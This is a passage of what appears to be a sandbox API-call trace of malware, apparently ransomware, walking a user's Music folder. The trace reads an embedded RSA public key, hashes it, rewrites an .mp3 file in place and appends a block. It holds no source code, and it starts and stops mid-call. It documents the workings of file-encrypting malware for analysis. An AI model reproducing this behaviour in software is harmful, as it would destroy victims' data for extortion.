cFileName="..", cAlternateFileName="")) returned 1 [0199.594] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7f8bcc0, ftCreationTime.dwHighDateTime=0x1d89dd8, ftLastAccessTime.dwLowDateTime=0x78c760, ftLastAccessTime.dwHighDateTime=0x1d8a184, ftLastWriteTime.dwLowDateTime=0x78c760, ftLastWriteTime.dwHighDateTime=0x1d8a184, nFileSizeHigh=0x0, nFileSizeLow=0x9a73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5B4VEsMcGlm7c.mp3", cAlternateFileName="5B4VES~1.MP3")) returned 1 [0199.594] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\5B4VEsMcGlm7c.mp3") returned=".mp3" [0199.594] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\5B4VEsMcGlm7c.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\5b4vesmcglm7c.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.595] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=39539) returned 1 [0199.595] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.599] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9a4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.599] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.602] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.602] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9a73, lpOverlapped=0x0) returned 1 [0199.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.603] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31ba80) returned 1 [0199.604] CryptCreateHash (in: hProv=0x31ba80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.605] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.605] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.605] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.605] GetLastError () returned 0x0 [0199.605] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.605] CryptReleaseContext (hProv=0x31ba80, dwFlags=0x0) returned 1 [0199.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.605] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.605] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.605] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9a70) returned 0x2af9168 [0199.606] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade980 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade9c8 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.607] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ae8 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6ad0 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0199.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0199.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.610] GetCurrentThreadId () returned 0x5d8 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5de0 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.611] GetCurrentThreadId () returned 0x5d8 [0199.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0199.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ae8 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b48 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b60 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0199.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ad0 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade9c8 | out: hHeap=0x2c0000) returned 1 [0199.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.623] WriteFile (in: hFile=0x584, lpBuffer=0x2af9168*, nNumberOfBytesToWrite=0x9a6e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af9168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9a6e, lpOverlapped=0x0) returned 1 [0199.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af9168 | out: hHeap=0x2c0000) returned 1 [0199.624] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9a73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.624] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 